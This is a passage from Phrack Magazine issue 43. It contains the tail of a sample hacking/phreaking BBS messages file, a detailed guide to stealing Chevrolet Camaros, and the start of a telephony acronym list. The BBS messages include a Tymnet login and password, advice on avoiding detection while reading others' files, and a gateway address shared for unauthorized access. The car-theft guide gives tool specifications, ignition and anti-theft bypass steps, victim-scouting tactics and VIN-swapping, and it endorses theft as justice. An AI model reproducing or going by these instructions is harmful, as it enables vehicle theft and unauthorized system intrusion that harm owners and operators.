whatever, can run on isis, and usually is found on slot 0. But other programs
can be run on other slots. Programs that allow you to log into the slot and do
things. like DDT - Dynamic Debugging Tool.
 
 
All this and more will be explained in my upcoming (hopefully) file on Tymnet
called-- Anatomy of a Packet Switching Network: MDC's TYMNET.
 
 
inter-link cleared from VALTDNET (C) H9 N4067 to TYMNET (C) H5981 N7347
inter-link cleared from H1 N2010 TESTNET to H1 N2200 BUBBNET
inter-link cleared from TYMNET (F) H5277 N6420 to BUBBNET (F) H15 N2324
inter-link cleared from AKNET to TYMNET
inter-link cleared from TYMNET to AKNET
inter-link cleared from TRWNET to PUBLIC TYMNET
inter-link cleared from PUBLIC TYMNET to TRWNET
 
please log in: DECLOD
Password: DECLODH
 
Interlink established from TYMNET to TSN-NET
 
Please log in: Gomer T. Geekster
 
--Lex
 
 
%> Message:  44 of 48
%> Title:    ontyme II
%> When:     4/4/89 at 1:15 am
%> Left by:  Lex Luthor [Level: 8]
 
The system used for setting up the DECLOD acct was TYMVALIDATE which isn't
exactly the same as NETVAL but close.
 
Be careful with ONTYME II, since it automatically updates ALL files you read.
So if you read some files in that persons' personal directory, they can see
that either someone has their acct/pass or someone is using IMITATE and reading
their stuff. Me and Skinny Puppy are working on a way to defeat this....
 
Lex
 
 
 
%> Message:  47 of 48
%> Title:    INTL TYMNET
%> When:     4/21/89 at 1:17 pm
%> Left by:  Skinny Puppy [Level: 8]
 
International Tymnet - how many of you have seen tymnet claiming that it serves
over 65 countries, but don't really belive it? well, they do, sort of.
There is a tymnet-europe called Mcdonnell Douglas Information Systems (MDIS).
While I don't have any dialups for it, I have X.121 addresses in France and
BeNeLuxKG. once you get there, you can type HELP and glean alot of what is
going on. The interesting thing is that a lot of things that say ACCESS NOT
PERMITTED from regular tymnet are actually european addresses and can be used
on MDIS. for instance, ROMA (Italian for ROME), ESAIRS, and EURONET (which is a
host selector for american public timesharing systems). While there doesn't
seem to be a lot of european hosts, I am sure that if everyone on here pulled
up all their old tymnet-hack sheets where they had things listed as ANP (My
abbreviated for ACCESS NOT PERMITTED) and tried a few we could find something
new. Right now, I will only give out my French MDIS gateway - It is
208092020029. Figure out how to get there yourself. If you DO find anything
interesting, leave me mail, and we can trade. I already have some internal MDIS
systems there, if I can just figure out how to use them.
 
Coming Soon to a Board not so near to you: NISNET (tymnet-japan) and the
Carribean tymnets. Until then, ASSIMILATE
 
Skinny Puppy  21 april 1989
 
 
_____________________________________________________________________________
 
%> Sub-board: Vocal Hacking
%> SubOp:     ANI Failure
%> Messages:  45
%> Files:     0
 
 
%> Message:  3 of 45
%> Title:    Operator engineering
%> When:     12/6/88 at 12:43 am
%> Left by:  Ferrod Sensor [Level: 8]
 
To answer ANIF's question, I have been doing some TSPS/TOPS engineering lately
for a variety of purposes, one of which is a bit far fetched but has
possibilities. I am trying to  find a way to possibly freeze an operator
console (the method I am trying is actually simpler than it sounds). It
involves getting the op to connect to a short circuite test code, either by ACS
(key) or by OGT (outgoing trunk) outpulsing sequence. There area a few flaws in
this though, the main one being the more than likely possibility of the Op
simply releasing the console position (even though the short circuit, when
dialed, cannot be hang up on, the  caller must wait for it to time out (about
three minutes or so).If this was the  case, then the result could be the
Operator having an inaccessible outgoing line for a short period of time, which
wouldn't affect much with the actuall console..The things I tried recently with
this didn't result in much, but if I take into account TOPS/TSPS RTA (Remote
Trunking Arrangements) setups (where a caller from one area code, with a 0+ or
0- call, may be connected to an operator in a site in a different NPA. Test
codes are different, even in exchanges, so an operator site in a diffeerent NPA
wouldn't be affected the same with a different code.
 
The overall purpose to this would be to create a certain condition with the
operator network that could be used to gain information when investigated, say
by someone from Mtce. engineering or theTOPS/TSPS SCC or equivalents. There are
other ways to start an engineer of course, but this is just something that's
concrete (meaning you could get people to fish around for info a bit easier
than coming in for a random request.
 
This is getting a bit long. I'lll post more later about Operator engineering,
something more immediately practical next time. The board looks promising.
 
                        Ferrod/LOD
 
 ______________________________________________________________________________
 
 
    LOD Communications: Leaders in Engineering, Social and Otherwise ;)
 
    Email:      lodcom@mindvox.phantom.com
    Voice Mail: 512-448-5098
    Snail Mail: LOD Communications
                603 W. 13th
                Suite 1A-278
                Austin, Texas USA 78701
 
 ______________________________________________________________________________
                       End Sample H/P BBS Messages File
 

LOD Communications: Leaders in Engineering, Social and Otherwise ;)
 
Email: lodcom@mindvox.phantom.com
Voice Mail: 512-448-5098
Snail Mail: LOD Communications
            603 W. 13th
            Suite 1A-278
            Austin, Texas USA 78701
 



--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 20 of 27

[** NOTE:  The following file is presented for informational purposes
           only.  Phrack Magazine takes no responsibility for anyone
           attempting the actions described within. **]

-----------------------------------------------------------------------------

                            The Step-by-Step Guide
                                     to
                              Stealing a Camaro

                                     by

                                  Spy  Ace

                         spyace@mindvox.phantom.com




PURPOSE:  To describe step-by-step, with specificity, exactly how
the average person might accomplish with skill and alacrity, the
theft of a motor vehicle, particularly 1982-1993 Chevrolet Camaros,
Pontiac Firebirds and similar beasts.

MOTIVE:  While I am a telecommunications enthusiast, I am also a
basically honest, law-abiding working man. In 1989 an individual
driving a borrowed automobile struck my only means of transportation,
a 1986 Chevrolet Camaro, totalling it. My vehicle was parked and
unoccupied at the time. In an amazing feat of legal maneuvering,
and after protracted judicial proceedings, all parties involved
managed to escape liability and I was left without a car or
reimbursement. The insurance companies are lying, cheating scum.
As a result, I took matters into my own hands and stole a
replacement car. I came to the conclusion that the justice system
in this country exists only to protect the strong from the weak,
the haves from the have-nots and the rich from the not rich. It
has nothing to do with rectifying wrongs. It is therefore incumbent
upon all aggrieved parties to seek personal satisfaction when the
American legal system fails to provide it. My motive is thus
twofold:

1.  To see the evil insurance companies screwed some more by
    sharing my knowledge of car-thieving techniques with those
    who might apply them.

2.  To assist the little man in obtaining justice when he/she may
    by confronted with a situation similar to mine.


BACKGROUND:  Before I stole my car, I conducted extensive research
             and talked to a number of individuals in the automotive
             repossession field, law-enforcement, and several auto
             mechanics. I assure the reader that everything
             contained in this file is true to the best of my
             knowledge and that I HAVE ACTUALLY DONE WHAT I AM
             WRITING ABOUT. I am not writing hypothetically; I
             speak from experience. I urge the reader, if he is
             serious about stealing a vehicle, to verify my
             research and find out much of this information for
             himself. Auto shops at local high schools/community
             colleges are excellent places to experiment and
             learn, and auto repossession specialists are invaluable
             sources of information.


------

  So, you've decided to steal a car. How nice. In this article I
will be covering in detail exactly how I stole a 1988 Chevrolet
Camaro to replace the 1986 of mine that was destroyed by an
irresponsible driver. The techniques described herein will work on
1982 thru 1993 Chevy Camaros/Z28s/IROCs/Berlinettas and probably
the same years Pontiac Firebirds and Trans Ams. With regard to
the Pontiacs I cannot say for certain because I only experimented
on Camaro variety cars since that is what I was after. The Pontiacs
are very similar, however, and I believe this information to be
applicable to them.

  There are basically only two stages to obtaining possession of a
vehicle. First, one must gain actual physical access to the inside
of the car and second, one must disable the steering-lock mechanism
and activate the ignition. Once these two things have been
accomplished, the vehicle is yours, subject to the infuriated
efforts of the owner to regain it. It should be noted, of course,
that there may be complications associated with either of these
steps, such as alarm systems or the factory anti-theft mechanisms.
I will deal with both of these in turn.

  First, gaining entrance to the vehicle. This will require one
tool: a 24-inch aluminum "shop" ruler. I tried several and settled
on the Pickett brand ACF-24, available in most art/blueprint supply
stores. It consists of a 1.25x24x1/16 inch piece of aluminum. For
maximum efficiency, it should have two slight bends to it. First,
at 14 inches, bend it subtly to about 15 degrees. Then, at 19
inches on the ruler, bend it back so that the two sections are
parallel. Like this:
                                                        N
                  _________________                   W + E
                                   \_______             S

  Of course, the angle in this diagram is far too steep. Both angles
should only be about 15 degrees. Hopefully, you get the idea. If
not, you probably shouldn't be thinking about stealing a car. In
any case, if you have succeeded in fashioning this, you are now
armed with the only tool necessary to gain keyless entry into your
soon-to-be new Camaro. The application of this tool is simple.
Walk up to a Chevrolet Camaro of a year described above, position
yourself at either door. FIRST: Check to see if the door is
unlocked. You'd be surprised. If it isn't, you will need to insert
the tool straight down, in between the rubber weather-stripping and
the glass, approximately 4-5 inches from the back of the door,
directly in line with the door-lock. Insert the tool such that the
small section (see above diagram) is thrust down into the door (did
I mention that stealing a car is very sexual? Never mind...). The
small section of the tool should be bent TOWARDS you as you stand
at the car. In the above diagram, north is towards the car, west is
straight up in the air, east is straight down towards the inside of
the door, and south is towards you as you stand at the car. Got the
picture? If not, get a friend to explain it to you.

  The tool should go in about 16 inches until it catches the lock
mechanism. If it goes in further than about 17 inches, withdraw and
try again. Drive straight down, don't force, try moving your
position an inch to the right or left. Eventually you will feel
the lock mechanism. It will be rigid but a little spongy (epitome
of GM engineering). Press down hard on the tool and let up. Try
the door handle. Does it open? It probably will. If not, drive a
little harder and keep trying the door. It will give eventually.

WHY THIS WORKS:  Well, this works for two reasons. First of all,
General Motors is run by a bunch of cheap bastards and their
cars are designed by engineers who couldn't find their asses with
both hands. Basically, it's a shitty lock mechanism. It was
designed shitty and the clods who sell us the piece-of-shit cars
couldn't care less if they get stolen so they've never bothered to
redesign the damn thing.

  In order to understand exactly why it works, the curious reader
would be well advised to go to his local library and look in a
Clymer or Chilton automotive repair manual for 1986 (or thereabouts)
Camaro.  In Chapter 12 of the Chilton, under "Body" (page
290 of mine) there is a magnificently concise exploded diagram of
"Outside door lock assembly" which contains all the relevant
information. The lock cylinder itself is connected to some linkage
which activates the locking/unlocking mechanism. After a few
months of normal use, this linkage develops some "slop" in it due
to slight wear of the locking cylinder attachment. By pressing
down on the linkage down inside the door, you are activating the
(un)locking mechanism directly and there is enough play in the
locking cylinder to allow it to give. Take a look at the diagram
and you'll understand completely.

  Once I understood the locking mechanism, the deficiencies
therein, and formulated an approach to overcoming it, I
practiced on a friend's Camaro about a hundred times. If done
properly and carefully, this will in no way harm any part of
the car or locking mechanism. Try it on the driver's side
first; this is usually the easiest because it has the most wear
in the linkage. Then graduate to the passenger side door. Then
try it out about a hundred times, then with your eyes closed,
then while drunk, then with one hand tied behind your back. In
a day or two you'll be able to get into a Camaro in less than
ten seconds.

  A note about alarms: some clever individuals, in an effort to
keep their prized vehicles from being stolen by the likes of you,
have equipped them with a motion sensor or other devious device
which tends to emit a shrill series of tones when aggravated. I
suggest that before trying to open someone else's car, you first
give it a good rocking back and forth in order to set off any
alarm which might be present. Since it is not illegal (though it
may be physically dangerous) to rock someone's car, it's always
best to try this before actually breaking in. If the alarm
screams, go on to some other victim. Personally, I have
encountered very few alarms; the "it won't happen to me" attitude
is still prevalent.

  Once you've gained physical entry into the vehicle, you are
now ready for Step Two, ignition lock bypass. Unfortunately, this
is a difficult step. I did a tremendous amount of research to
determine the best way to deal with this problem and have
developed an approach. It is by no means the only way to breach
the ignition locking mechanism, but in my opinion it is the
best. In developing this method I was most interested in several
goals. First of all, I wanted an elegant solution; that is,
something simple. Minimum tools and work required, and something
that worked ALL THE TIME, not 50%. Second, I wanted an approach
that could be accomplished quickly (for obvious reasons) and with
minimum damage to the vehicle. Ideally, I wanted an attack which
would not even be immediately obvious to someone (such as a cop)
glancing in my car at a stoplight. Spending 30 minutes tearing
apart the steering column might allow you to get the car started,
but it won't meet the above criteria: speed, elegance, reliability,
invisibility.

  The problem is that to do this requires a special tool and to
get this tool one must either send away for it or have access to
a machine shop to fabricate one. Neither of these is quick and
easy, but the preparation is well worth it. Here's the basic
idea. The General Motors vehicle uses an ignition locking
mechanism called a "sidebar." This is basically one nasty piece
of hardened fucking steel which blocks the lock cylinder from
rotating when a properly-fitting key is not in place. It makes
it impossible to simply "shear off the pins" by brute-force
turning with a screwdriver or similar device. The solution is to
use a tool capable of cracking the lock cylinder housing in which
the sidebar sits. The cylinder housing itself is cast aluminum,
which is considerably weaker than the sidebar itself, so when the
proper force is applied it will be the housing which gives, not
the sidebar. But no matter.

  First, get access to a Camaro, or for this exercise, just about
any GM automobile since 1978 (the year they got the bright idea
to put a locking screw in to keep people from just ripping the
whole ignition lockset right out -- but that's a whole different
story...). My favorite place to experiment on cars without being
observed (and in fact legally) is to go to a local self-serve
auto-wrecking "You Pull It" yard. They have these in many cities
around the fruited plains; you pay a buck or two to get in and then
go pluck parts from rotting American classics. If you don't drag
any parts out, you can basically tear apart all the cars you want
for a buck. If you don't have a You-Pluck-It nearby or are
philosophically opposed to vehicular cannibalism, then use the
method previously described to break into someone's Camaro for this.

  Once you have access to a GM (preferably a Camaro), get a
screwdriver out and pry the outer ring off of the ignition set.
The ring I'm talking about is the thing with the two tabs on it
for your fingers to turn when you rotate the ignition to start
the car. Just pry that sucker off of there -- it comes off very
easily as it is affixed by two small gripping tabs. I can usually
remove it by hand, but it's easiest to simply pry gently with a
screwdriver. After you have pried that off of the ignition set,
take a look. You'll see the ignition cylinder (with the keyway),
the outer housing, and the actual ignition activation mechanism,
which has two slots in it (where the outer ring fit into before
you pried it off). This ignition linkage, with the two tabs, is
what turns when a fitting key is inserted into the keyway and then
turned. Note that in a GM ignition set, a fitting key serves only
to withdraw the sidebar to allow the outer ignition mechanism to
turn.

  The problem is to overcome the sidebar which prevents the
ignition from turning. Fortunately, there is a tool for this very
purpose. It is manufactured by Briggs and Stratton (yes, the lawn
mower engine people) who happen to also make the locksets for GM.
They make the locks. They make the tool to break the locks. You
figure it out. Anyway, this neat little device is called a "GM
Force Tool". I got mine from LDM Enterprises in Van Nuys, California
(where else?) and it ran me about $90. Their fone number is
800-451-5950 and you should probably tell them that you're in the
automotive repossession business if you go to order one of these.
If they won't sell you one (because someone at GM read this
article and hopped up and down) then simply go down to a local
repo man and pay him an extra $25 to order one for you. Most of
those guys are pretty sleazy and will do just about anything for
a buck. If you have access to a machine shop and are reasonably
competent, go ahead and make one.

  I will attempt a description. Don't feel stupid if you don't
get this; it's difficult to describe it in text. Drop me E-mail
and I'll send you a .GIF of the fucking thing. Anyway, it looks
basically like a socket with very thin walls and two small tabs
which fit into where the thumb-ring-thing used to go. You tap it
onto the ignition set, into the two slots and the outside walls
of the tool fit very snugly around the outside of the locking
mechanism to keep it from splitting apart as you turn it. On the
other end of the tool is a 1/2 inch square hole for a ratchet.
Got the idea? Tap it onto the ignition, attach a healthy sized
ratchet and turn slowly but forcefully. After about 30 degrees of
turn the sidebar will crack the ignition lock housing and the
whole mechanism will freely turn. If you don't understand this,
take a look at a GM ignition (sans outer ring) and the facts will
become readily apparent. If you have access to a machine shop, it
is a simple matter to make one of these tools. Go to your local
GM dealer and buy a whole ignition set, snap the outer ring off of
there and take your measurements. Remember that the inner wall of
the force tool must fit snugly around the lockset in order to keep
it from splitting apart. That is why a device with simply two tabs
which fit into the ignition linkage will not work (I tried it --
the metal is too soft and tears apart).

  Seem like too much work? Well, of course it is a bit of work,
but preparation is the key! My father always stressed that the
most important part of doing a job is having the right tools. The
tools in this case are KNOWLEDGE of how all these goofy parts fit
together and operate, a properly constructed force tool, and the
patience to apply these two components to bring about the desired
result. With some practice I was able to circumvent a Camaro
ignition in just under 30 seconds. It does very little actual
damage to the vehicle ($11.00 for a new ignition set) and in fact
the thumb-ring-thing can be jammed back on and a key inserted and
it will appear that everything is proper (in case you're pulled
over by the local constable).


V.A.T.S.
--------

  Because of the horrendous problems with car theft, particularly of
Camaros, GM came up with a neat system boldly dubbed the "Vehicle
Anti Theft System". Needless to say, as with most security devices,
VATS accomplished little more than being a nuisance to vehicle owners
and a minor inconvenience to car thieves. Here's how to defeat it.

  First, basic theory of operation. The ignition of a VATS equipped
vehicle (most 1988 and newer GMs, particularly the Camaros/Firebirds)
is the same as the normal GM ignition except that it has an
electronic sensor built in which requires activation by a resistor
pack built in to the owner's key. There are fifteen possible resistor
types, so each different VATS key that you have gives you a 6.7%
chance of being capable of activating the ignition. The catch is that
if you feed it the wrong one it will kill the ignition for 4 minutes.
Thus, if you had a complete set of fifteen VATS keys, it would take
you a maximum of one hour to run through them all. This is GM's
idea of security: annoy the thief.

  If you plan to tackle a VATS-equipped car, get a full set of the
fifteen VATS keys. They're a few bucks each and you can get them
from a locksmith or LDM. Obtain access to your target car in an
area and in such circumstances as will allow you to work for an
hour relatively undisturbed. In practice, this is not very difficult
(more on that later). Once you have access to the vehicle and are
satisfied that you can work unobserved, break the ignition lock
using your force-tool as described above. Insert your first VATS
key blank and attempt to start the vehicle. If it will not activate
the ignition, remove the key, wait four minutes and try the next
one. Eventually you'll hit it. (Median hit time, of course: 30
minutes). Drive away.


Scouting a Victim
-----------------

  An essential element of stealing a car without getting caught
is picking out the right one. Again, preparation is the key. Once
you've mastered the necessary techniques, start looking around for
a good place to pick up a vehicle. The car thieves that I spoke
with told me that their preferred places are mall parking lots at
night: there is a lot of activity so you probably won't be noticed
lurking around waiting for a good prospect to show up. People
usually go into the mall for several hours to buy crap, so you have
time to work. Wait until no one is looking and pounce. Once you are
inside the vehicle (which, with practice, may be accomplished in
15 seconds) you are home free. No one is going to pay any attention
to you screwing around inside the vehicle and you'll be long gone
by the time the owner finishes charging a new Salad Shooter on his
American Express. Another good place is airport parking lots. While
they are often sporadically patrolled, it is in practice a simple
matter to drive around until you spy the right vehicle, then pack
all your necessary tools into a suitcase and walk from the terminal
to the lot like a returning airline passenger. That's how I did it.
The car was not reported stolen for over two weeks (it was in the
long-term lot), giving me plenty of breathing room.

  There are numerous other places. Start noting the places that
you leave your car: supermarket, movie theater, in front of your
house, at work, in a parking garage, etc. Start noticing patterns.
That 1988 IROC you see parked in the same place for five hours
every Tuesday. When you actually commit the deed, BE PREPARED. Do
a dry run. Be calm, work quickly but carefully. Act like you
belong where you are -- don't lurk around nervously. Walk right
up to the car and steal it. If confronted by someone, try to talk
your way out of it. Don't get violent: it's just a thing. A car
is not worth hurting someone over. Don't worry about getting
caught: most cities can't cope with the crime epidemic and do not
bother to do much about auto theft.


What Do I Do With It?
---------------------

  That's up to you. Take it for a joy ride. If you boosted it from
an airport lot you can probably safely cruise around in it for a
week or two. Go pick up bimbos and drive them to Las Vegas. Or
sell the thing to a chop shop (you're on your own finding them; I
have no experience with them). Tear it apart yourself and sell the
parts. Drive it into the lobby of an insurance company building.
Or go buy a Camaro of the same year and model that has been
totalled out and switch the VIN plates once you have clear title.
That's not a particularly difficult affair, although some skill is
required to remove the VIN tags and install them in your new car.
Have fun! Stay out of trouble. If you have any questions, E-mail
me. Above all, keep in mind that two things are essential to steal
a car without getting caught: PRACTICE and PREPARATION. Good luck!

                          -->Spy Ace<--
                   spyace@mindvox.phantom.com

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 21 of 27

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +                                                             +
    +                                                             +
    +   The Telephony Acronyms and Abbreviations List from Hell   +
    +                                                             +
    +                                                             +
    +            by                                               +
    +                      Crisp GRASP                            +
    +                                                             +
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


 Well, here it is, the list from hell. Sure beats the old lists of 100
or so three letter acronyms. The whole reason for this list is so that
you  can  crack almost ANY bell document.  This list came from  a  few
lists  (one in Phrack a while back)  and a few other Telephony  lists
here and there. Though it must be noted (and i want to take credit for
it)  that  well over half of the acronyms and abbreviations were typed
in by me,  inputed into my database (of course I am not about to give
out my database).
    It is always a good idea to start a database, one will learn a lot
faster.   It  is  doing  things scientific like,  and for  someone  as
compulsive as I,  solving the puzzle of the telephone company was easy
as pie. I must say that all the hackers I have meet, and talked to are
all compulsive as hell <G>.  I think it is just what it comes down to,
who is willing to learn.   Any ways here is two fields in my database,
one small part,  but worth it.   Though i do not think it will be able
to  help most of you out,  just gets into too much,  and understanding
which  acronym goes where,  and understanding what goes where is hard.
Well good luck!

Greets to Bell Northern Labs, never see too much from you press wise!
and to SRI, should have come to Cal. hah  (Don knows what I am talking
about, his funding is short)

--------------------------------------------------------------------------

15M          Fifteen minutes
15S          Fifteen seconds
1CF          Singal party coing first pay phone
1FAC         Interface packs
1FB          One party flat business rate
1OF          One party official (telco) business line
2SPDT        Partial dial timeout in the second stage of a traditional
              2-stage international
2SPST        Permanent signal timeout in the second stage of a traditional
              2-stage international
2SVCA        Vacant code in the second stage of a traditional 2-stage
              international outbound
2W           Two wire (pair) (circuit)
2WAY         Two-way trunk groups
300          Log command menu (SARTS command)
376          Log clear (SARTS command)
384          Write log (SARTS command)
385          Read log (SARTS command)
399          Log print (SARTS command)
3KHZ         Three kilohertz
3RNGR        Three ringer
3WO          Third wire open
4W           Four wire (pair) (circuit)
600          Test menu (SARTS command)
600B         600-ohm briged connection
611          Detail tests (SARTS command)
621          Macro command menu (SARTS command)
631          Automatic test command (SARTS command)
735T         735-ohm compromise termination
?A           Action field contains an error
?D           Data field contains an error
?E           Error exist in the message but can ot be resolved to the
              proper field
?I           Identification field contains an error
?T           Time-out has occured on channel
?W           Warning message
A            A side (lead) (pair)
A            Area
A            Telephone number or trunk group and member number from trouble
A/B          Two wire phone connection (T&R)
AA           Automatic answer
AA           Packet analog access line INTER/TRA blocal 1-26
AABS         Automatic alternate billing service
AAE          Auxiliary access equipment
AAR          Automatic alternate routing
AAX          Automated attendant exchange
AB           Packet switch trunk INTER/TRA blocal 1-26
ABATS        Automatic bit access test system
ABATS        Automatic bit access test system (DDS service)
ABC          Automatic bill calling (TSPS)
ABF          Abandon failure
ABF          Abandon failure (MDII)
ABHC         Average busy hour calls
ABL          Auxiliary Buffer oder word Left half
ABM          Asynchronous balanced mode ( -> SABME)
ABME         ABM extended
ABR          Auxiliary Buffer order word Right half
ABS          Alternate billing service
ABS          Alternative billing service
ABSBH        Average busy season busy hour
ABT          Abort
ABV          Above
AC           Administrative computer
AC           Alternating current
AC           Assembly code
ACA          Asynchronous communication adapter
ACB          Annoyance call bureau
ACB          Automatic call-back
ACC          Audio communications controller
ACCS         Automated calling card service
ACD          Automatic call distribution
ACD          Automatic call distributor
ACDA         Automatic call disposition analyzer
ACDN         Access Directory Number
ACDN         Access directory number
ACE          Assignment change establish
ACE          Automatic calling equipment
ACES         Aris cabs entry system
ACF          Advanced communications functions
ACFA         Advanced CMOS frame aligner peb2030
ACG          Automatic call gap
ACH          Attempt per circuit per hour
ACI          Answer controller interface (IOM2 monitor command)
ACIA         Asynchronous communications interface adapter
ACK          Acknowledge
ACK          No acknowledgement wink
ACK          No acknowledgement wink (MDII)
ACKDB        Acknowledgement database
ACM          Address complete msg. (SS7: in ISUP)
ACOF         Attendant control of facilities
ACP          Action point
ACSE         Association control service element
ACSNET       Acedemic computing services network
ACSR         Automatic customer station rearrangement
ACSU         Advanced T-1 channel service unit
ACT          AC Testing definition
ACT          AC testing definition
ACT          Activate
ACT          Active
ACT          Auto or automatic circuit transactions
ACTS         Automated coin toll service
ACTV         Acticated
ACTVD        Activated
ACU          Alarm control unit
ACU          Automatic calling unit
AD           Attendant INTER/TRA blocal 1-26
ADAP         Audix data acquisition package
ADAS         Advanced directory assistance system
ADC          American digital cellular
ADC          Analog to digital converter
ADCCP        Advanced data communication controll procedure
ADCCP        Advanced data communications control procedure
ADCI         Automatic display call indicator
ADD EXP      Address expander
ADDL         Additional
ADDR         Address translations
ADJ          Ajust
ADM          Add-drop multiplex
ADMA         Advanced DMA controller SAB82258
ADN          Abbreviated dialing number
ADP          Automatic diagnostic process.
ADPCM        Adaptive PCM
ADS          Administration of designed services
ADS          Administration of designed services review
ADS          Advanced digital system
ADS          Audio distribution system
ADS          Auxilary data system
ADSL         Asymmetrical digital subscriber line
ADTS         Automated digital terminal system
ADTS         Automatic data test system
ADTS         Automatic digital terminal system
ADU          Automatic dialing unit
AERM         Alignment error rate monitor
AF           Commercial audio fulltime INTER/TRA blocal 1-26
AFACTS       Automatic facilities test system
AFADS        Automatic force adjustment data system
AFE          Analog front end
AFI          Authority and format identifier (ISO 7498)
AFSC         Advanced features service center
AFSK         Automatic frequency shift keying
AG/EEE       Above ground electronic equipment enclosures
AGC          Automatic gain control
AGM          Normal aging months
AGND         Analog ground
AGT          Accelerated aging type
AI           Activate indication (C/I channel code)
AI           Artificial intelligence
AI           Assigner's initials
AI           Automatic identified outward dialing INTER/TRA blocal 1-26
AIC          Automatic intercept center
AICC         Automatic intercept communications controller
AIN          Advanced intelligent network
AIOD         Automatic id of outward dialing
AIOD         Automatic identifaction of outward dialing
AIS          Alarm indication signal
AIS          Alarm indication signals
AIS          Automatic intercept system
AIT          Analit initialization of tables
AIU          AI upstream
AL           Alternate services INTER/TRA blocal 1-26
ALATS        Automatic loop access system system (DDS service)
ALBO         Automatic line buildout
ALE          Address latch enable
ALE          Automatic line evaluation
ALFE         Analog line front end
ALGOL        Algorhythmic computer language
ALI          Automatic location indentification
ALIT         Automatic line insulation testing
ALL          All events
ALL          All module controller maintenance interrupts
ALL          Turns on all IDs
ALPT         Alarm scan points
ALRM         Alarms
ALRU         Automatic line record update
ALS          Automated list service
AM           Administrative module
AM           Amplitude modulation
AM           Asynchronous multiplexer
AM           Packet
AMA          Automatic Message Accounting
AMA          Automatic message accounting
AMACS        AMA collection system
AMAIRR       Automatic message accounting irregularity
AMALOST      Lost automatic message accounting
AMARC        AMA recent change
AMARC        AMA recording center
AMASE        AMA standard entry
AMAT         Automatic message accounting transmitter
AMATPS       Automatic message accounting teleprocessing system
AMATPS       Automatic message accounting transmitter teleprocessing system
AMC          Add-on module connector (-> sipb)
AMERITECH    American information technologies
AMI          Alternate mark inversion code
AML          Automatic maintenance limit.
AMP          Advance measurement processor
AMP          Amplifier
AMPS         Advanced mobile phone service
AMR          Automatic meter reading
AMWI         Active message waiting indicator
AN           Announcement service INTER/TRA blocal 1-26
AN           Associated number
ANA          Automatic number announcement
ANC          All number calling
ANCT         Analysis control table
ANI          Automatic number identification
ANIF         Automatic number identification failure
ANM          Answer msg. (SS7: in ISUP)
ANS          Answer
ANS          Answer On Bus
ANS          Answer msg.
ANSER        AT&T Network Servicing System (i.e.  via EADAS link )
ANSI         American national standards institute
AO           Allocation order
AO           International/overseas audio (full time) INTER/TRA blocal 1-26
AOC          Advice of charge (i.256 B)
AOSS         Auxilliary operator service system
AP           Access point
AP           Application (OSI layer 7)
AP           Application processor
AP           Attached processor
AP           Auciliary processor
AP           Automatic position
AP           Commercial audio (part time) INTER/TRA blocal 1-26
AP-PG        Access point page
APC          Alarm processor circuit
APC          Amarc protocol converter
APD          Access point data
APD          Avalanche photo diode
APDB         Access point data base
APDL         Application processor data link
APH          Application protocol handler
API          Application interface
APM          Application processor modules
APPC         Advanced program to program communication (IBM)
APPL1-APPL5  Reserved for application handlers
APS          Automatic position system
APS          Automatic protection switch
APS          Automatic protection switching system
AQ           Autoquote problem.
AR           Activation request (C/I channel code)
AR           Alarm report
AR01         Office alarm - 1AESS alarm message -
AR02         Alarm retired or transferred - 1AESS alarm message -
AR03         Fuse blown - 1AESS alarm message -
AR04         Unknown alarm scan point activated - 1AESS alarm message -
AR05         Commercial power failure - 1AESS alarm message -
AR06         Switchroom alarm via alarm grid - 1AESS alarm message -
AR07         Power plant alarm - 1AESS alarm message -
AR08         Alarm circuit battery loss - 1AESS alarm message -
AR09         AMA bus fuse blown - 1AESS alarm message -
AR10         Alarm configuration has been changed (retired inhibited) - 1AESS
AR11         Power converter trouble - 1AESS alarm message -
AR13         Carrier group alarm - 1AESS alarm message -
AR15         Hourly report on building and power alarms - 1AESS alarm message
ARA          Automatic reservation adjustment
ARC          Administrative responsibility code
ARC          Alternate route cancellation
ARC          Alternate route cancellation control
ARC          Audio response controller
ARCOFI       Audio ringing codec filter
ARCOFI-SP    ARCOFI + speakerphone function
ARCOS        ARCOFI coefficient support program
ARCOTI       SIPB telephone module
ARD          AR downstream
ARG          Alarm reference guide
ARG          Assemble and run a given master file
ARIS         Audichron recorded information system
ARL          Activation request local loop (C/I channel code)
ARM          Activation request maintenance (C/I channel code)
ARM          Asynchronous response mode
ARM          Automatic R(emote test system) maintance
ARMAR        Automatic request for manual assistance resolution
ARN          Activation request
ARQ          Automatic repeat request
ARR          Automatic ring recovery.
ARS          Alternate route selection
ARS          Automatic route selection
ARSB         Automated repair service bureau
ARSB         Automatic repair service bureau
ARSSI        Automatic rought selection screening index
ART          Audible ringing tone
ARU          Activation request upstream
ARU          Audio response unit
ASAP         As soon as possible
ASC          Alarm and status circuit
ASC          Alarm and status circuit .
ASC          Alarm surveillance  and control
ASCC2        Advanced serial communication controller
ASCII        American standard code for information interchange
ASCII        American standard code for information interexchange
ASD          Automated SMAS diagnostics
ASDPE        Synchronous data link controller (SDLC) A reset
ASE          Application service element
ASEC         Assignment section
ASGN         Assign
ASGNMTS      Assignments
ASIC         Application specific integrated circuit
ASM          Analog subscriber module
ASOC         Administrative service oversight center
ASP          Advanced service platform
ASP          Arcofi signal processor
ASPACGCOMP   ASP SCP response message with an ACG component received at the
              switch
ASPBADRESP   ASP SCP response message received with invalid data
ASPEN        Automatic system for performance evaluation of the network
ASPNORTEMSG  ASP reject message ret err and a play announc recei at the
              switch from the SCP
ASPSNCOMP    ASP SCP response message with a send notifi component received
               at the switch
ASPTNMSG     ASP termination notification message sent from the switch to
               the SCP
ASR          Access service request
ASSN         Assignment
AST          Position acknowledge seizure signal time-out (MDII)
ASYNC        Asynchronous
AT           Access tandem
AT           International/overseas audio (part time) INTER/TRA blocal 1-26
AT&T         American telephone and telegraph
AT-1         Auto test-1
AT-2         Auto test-2
AT01         Results of trunk test - 1AESS automatic trunk test
ATA          Automatic trunk analysis
ATAB         Area trunk assignment bureau
ATAI         Automatic troubler analysis interface
ATB          All Trunks Busy
ATB          All trunks busy
ATC          Automated testing control
ATC          Automatic transmission control
ATD          Accept date
ATD          Async. TDM
ATH          Abbreviated trouble history
ATI          Automatic test inhibit
ATI          Awake TI
ATICS        Automated toll integrity checking system
ATIS         Automatic transmitter identification system
ATM          Analog trunk module
ATM          Asynchronous transfer mode
ATM          Automatic teller machine
